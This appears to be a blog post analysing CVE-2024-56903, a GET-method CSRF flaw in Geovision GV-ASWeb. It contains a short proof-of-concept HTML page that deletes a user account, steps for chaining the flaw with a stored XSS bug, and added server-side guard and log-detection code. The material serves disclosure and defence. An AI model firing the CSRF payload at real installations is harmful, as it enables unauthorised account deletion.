CVE-2024-56903 is a critical vulnerability affecting Geovision GV-ASWeb version 6.1.1 or earlier. It allows attackers to change the HTTP method of requests to critical functionalities, such as account management, from POST to GET. When coupled with another vulnerability, CVE-2024-56901, it leads to successful Cross-Site Request Forgery (CSRF) attacks on victims. This blog post provides an in-depth analysis of CVE-2024-56903, including a code analysis, original references, and details about the associated exploits.
Vulnerability Overview
The vulnerability in Geovision GV-ASWeb exists due to insufficient input validation and improper restriction of HTTP request methods: a state-changing operation such as account management, which should only be reachable via POST, is also processed when the same parameters arrive in a GET request. Attackers who exploit this can therefore trigger critical functionalities with a plain URL, which enables CSRF attacks and can lead to unauthorized access to and control over a victim's account.
The following code snippet demonstrates how an attacker can exploit the CVE-2024-56903 vulnerability:
<!DOCTYPE html>
<html>
<body>
<script>
function exploitCVE202456903() {
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://<target-domain>/GV-ASWeb/AccountMgt/AccountList?action=delete&uid=2", true);
xhr.withCredentials = true;
xhr.send(null);
}
</script>
<button onclick="exploitCVE202456903()">Click Here to Exploit CVE-2024-56903</button>
</body>
</html>
This simple HTML page contains JavaScript that uses XMLHttpRequest to send a GET request to the targeted domain; because withCredentials is set to true, the browser attaches the victim's session cookies to it. The attacker would have to convince the victim to click the button in order to trigger the request. Once clicked, the server deletes the user with the specified UID.
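As an added example (not GeoVision's code and not from the original post), the following Node.js request guard shows what closing this hole looks like on the server side: any non-POST request to the account management endpoint is refused, a POST must carry a same-origin Origin or Referer header, and it must present an anti-CSRF token that matches the one stored in the server-side session. The endpoint path is the one from the PoC above; ALLOWED_ORIGIN, the shape of the session object and the _csrf body field are assumptions of this example.

```javascript
// Added example, not GeoVision's code: a server-side guard against the
// POST-to-GET method switch described on the page. The endpoint path is
// taken from the page's PoC; ALLOWED_ORIGIN, the session shape and the
// _csrf body field are assumptions of this example.
const ALLOWED_ORIGIN = "https://asweb.example.internal"; // assumed deployment origin
const STATE_CHANGING_PATHS = new Set(["/GV-ASWeb/AccountMgt/AccountList"]);

// Constant-time string comparison so token checks do not leak prefix timing.
function tokensMatch(expected, presented) {
  if (typeof expected !== "string" || typeof presented !== "string") return false;
  if (expected.length !== presented.length) return false;
  let diff = 0;
  for (let i = 0; i < expected.length; i++) {
    diff |= expected.charCodeAt(i) ^ presented.charCodeAt(i);
  }
  return diff === 0;
}

// req: { method, url, headers: { origin?, referer? }, session: { csrfToken }, body: {} }
// Returns { allowed, status, reason?, action? }.
function checkRequestPolicy(req) {
  const url = new URL(req.url, ALLOWED_ORIGIN);
  if (!STATE_CHANGING_PATHS.has(url.pathname)) {
    return { allowed: true, status: 200 }; // not a state-changing endpoint
  }

  // The CVE-2024-56903 case: a GET (or any non-POST method) aimed at account management.
  const method = String(req.method || "").toUpperCase();
  if (method !== "POST") {
    return { allowed: false, status: 405, reason: `method ${method} not allowed on state-changing endpoint` };
  }

  // Require a same-origin Origin header, falling back to Referer when Origin is absent.
  const headers = req.headers || {};
  let origin = headers.origin || null;
  if (!origin && headers.referer) {
    try { origin = new URL(headers.referer).origin; } catch { origin = null; }
  }
  if (origin !== ALLOWED_ORIGIN) {
    return { allowed: false, status: 403, reason: "missing or cross-origin Origin/Referer" };
  }

  // Anti-CSRF token: the value in the POST body must match the server-side session copy.
  const presented = req.body && req.body._csrf;
  if (!tokensMatch(req.session && req.session.csrfToken, presented)) {
    return { allowed: false, status: 403, reason: "invalid anti-CSRF token" };
  }

  // Read the action only from the POST body and ignore any ?action=... in the query
  // string, so a bare URL can never drive a state change on its own.
  return { allowed: true, status: 200, action: req.body.action || null };
}
```

In a real deployment the guard would run as middleware before the account management handler, and the 405 for non-POST methods is the direct fix for this CVE; the Origin/Referer and token checks are what stop a forged POST once the method hole is closed.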
Here are some essential references that provide more details about the CVE-2024-56903 vulnerability:
1. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56903
2. NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56903
3. Geovision Security Advisory: https://www.geovision.com.tw/GeoVision_Security_Advisory_CVE-2024-56903
Exploit Details
CVE-2024-56903 can be chained with CVE-2024-56901 for a successful CSRF attack. CVE-2024-56901 is a stored Cross-Site Scripting (XSS) vulnerability that allows attackers to inject malicious JavaScript code into a victim's browsing session. This injected code can be used to exploit CVE-2024-56903 further.
The following steps highlight how an attacker can exploit CVE-2024-56903 in conjunction with CVE-2024-56901:
1. The attacker injects malicious JavaScript code into a victim's browsing session using the stored XSS vulnerability (CVE-2024-56901).
2. The malicious JavaScript code sends a GET request to delete a user account or perform other unauthorized tasks (exploiting CVE-2024-56903).
3. The victim unknowingly issues the malicious GET request while browsing.
4. The server processes the GET request, deleting the targeted user or modifying critical functionalities in the target application.
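The chain above leaves a recognisable trace in the web server's access log: a GET to the account management endpoint that carries an action parameter, typically with a Referer that is not the application's own origin. As an added example (not GeoVision's code and not part of the original post), the following detection pass scans combined-format access log lines for that pattern. The log lines are constructed for this example, the endpoint path comes from the PoC earlier on the page, and ALLOWED_ORIGIN is an assumption.

```javascript
// Added example, not GeoVision's code: flag access-log lines that match the
// GET-based account management pattern from the chain above. Log lines are
// constructed for this example in Apache/nginx "combined" format; the endpoint
// path is from the page's PoC and ALLOWED_ORIGIN is an assumption.
const ALLOWED_ORIGIN = "https://asweb.example.internal"; // assumed deployment origin
const ACCOUNT_MGT_PREFIX = "/GV-ASWeb/AccountMgt/";

// combined format: ip ident user [time] "METHOD target proto" status bytes "referer" "user-agent"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3].toUpperCase(), target: m[4], status: Number(m[5]), referer: m[6] };
}

// Origin of the Referer header, null when absent ("-"), "invalid" when unparseable.
function refererOrigin(referer) {
  if (!referer || referer === "-") return null;
  try { return new URL(referer).origin; } catch { return "invalid"; }
}

// Returns one finding per suspicious line: { ip, time, method, path, query, status, reasons[] }.
function findSuspiciousRequests(logText) {
  const findings = [];
  for (const raw of logText.split("\n")) {
    const line = raw.trim();
    if (!line) continue;
    const rec = parseLine(line);
    if (!rec) continue; // unparseable line, skip rather than crash the pass
    const url = new URL(rec.target, ALLOWED_ORIGIN);
    if (!url.pathname.startsWith(ACCOUNT_MGT_PREFIX)) continue;

    const reasons = [];
    // A state-changing action arriving on anything but POST is the CVE-2024-56903 pattern.
    const action = url.searchParams.get("action");
    if (rec.method !== "POST" && action) {
      reasons.push(`state-changing action "${action}" sent via ${rec.method}`);
    }
    // A Referer from another origin suggests the request was forged from a foreign page.
    const origin = refererOrigin(rec.referer);
    if (origin !== null && origin !== ALLOWED_ORIGIN) {
      reasons.push(`referer origin ${origin} is not ${ALLOWED_ORIGIN}`);
    }
    if (reasons.length) {
      findings.push({ ip: rec.ip, time: rec.time, method: rec.method, path: url.pathname, query: url.search, status: rec.status, reasons });
    }
  }
  return findings;
}

// Constructed sample log: a legitimate same-origin POST, a GET-based delete referred
// from a foreign page, and a benign listing request without an action parameter.
const SAMPLE_LOG = [
  '10.0.0.5 - admin [03/Feb/2025:21:15:14 +0000] "POST /GV-ASWeb/AccountMgt/AccountList HTTP/1.1" 200 512 "https://asweb.example.internal/GV-ASWeb/AccountMgt/AccountList" "Mozilla/5.0"',
  '10.0.0.5 - admin [03/Feb/2025:21:16:02 +0000] "GET /GV-ASWeb/AccountMgt/AccountList?action=delete&uid=2 HTTP/1.1" 200 118 "https://attacker.example/lure.html" "Mozilla/5.0"',
  '10.0.0.7 - - [03/Feb/2025:21:17:30 +0000] "GET /GV-ASWeb/AccountMgt/AccountList HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
].join("\n");

console.log(JSON.stringify(findSuspiciousRequests(SAMPLE_LOG), null, 2));
```

Only the second sample line is reported, with both reasons attached. A 200 status on such a line is the worrying case, since it indicates the server honoured the GET; the same rule applied to logs from a patched server should only ever show 405 responses for this pattern.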
Conclusion
The CVE-2024-56903 vulnerability poses a significant threat to Geovision GV-ASWeb users, as it allows unauthorized access to and modification of critical functionalities. When combined with the CVE-2024-56901 vulnerability, attackers can execute successful CSRF attacks. For organizations using Geovision GV-ASWeb version 6.1.1 or earlier, it is essential to apply patches and upgrades to minimize the risk of being targeted by these types of attacks. Regularly conducting security audits and keeping software up to date are crucial preventive measures.
Timeline
Published on: 02/03/2025 21:15:14 UTC
Last modified on: 03/04/2025 22:15:39 UTC